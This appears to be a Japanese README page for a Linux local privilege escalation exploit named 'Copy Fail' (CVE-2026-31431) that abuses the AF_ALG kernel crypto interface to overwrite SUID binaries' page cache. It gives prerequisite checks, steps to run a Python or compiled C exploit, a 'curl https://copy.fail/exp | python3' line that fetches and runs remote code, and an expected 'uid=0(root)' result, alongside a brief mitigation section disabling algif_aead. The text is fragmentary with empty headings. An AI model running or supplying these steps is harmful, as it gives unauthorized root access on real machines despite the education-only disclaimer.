
ほとんどのLinux LPEはレースウィンドウやカーネル固有のオフセットを必要とします。Copy Failは直線的なロジックの欠陥であり、そのどちらも必要としません。同じ732バイトのPythonスクリプト(または.c elf)が、2017年以降に出荷されたすべてのLinuxディストリビューションをroot化します。
このコンテンツは教育および許可されたセキュリティテスト目的のみに使用されます。明示的な許可なしにシステム上で実行しないでください。
Copy Fail (CVE-2026-31431) は、AF_ALG を介してカーネル暗号化APIに影響を与えるLinuxローカル権限昇格(LPE)の脆弱性です。
これにより、権限のないユーザーがSUIDバイナリ(例: /usr/bin/su)のページキャッシュデータを上書きし、rootアクセスを取得できます。
AF_ALG が有効algif_aead モジュールがロードされているos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
期待される指標:
authencesn(hmac(sha256),cbc(aes))algif_aead がロードされているpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
期待される結果:
uid=0(root)
os.splice not found原因:
解決策:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
考えられる原因:
必要なツールをインストール:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
システムを更新:
apt update && apt upgrade
エクスプロイトが失敗した場合、以下を検討してください:
このエクスプロイトは、ラボ、CTF、および許可されたペンテストでのみ責任を持って使用してください。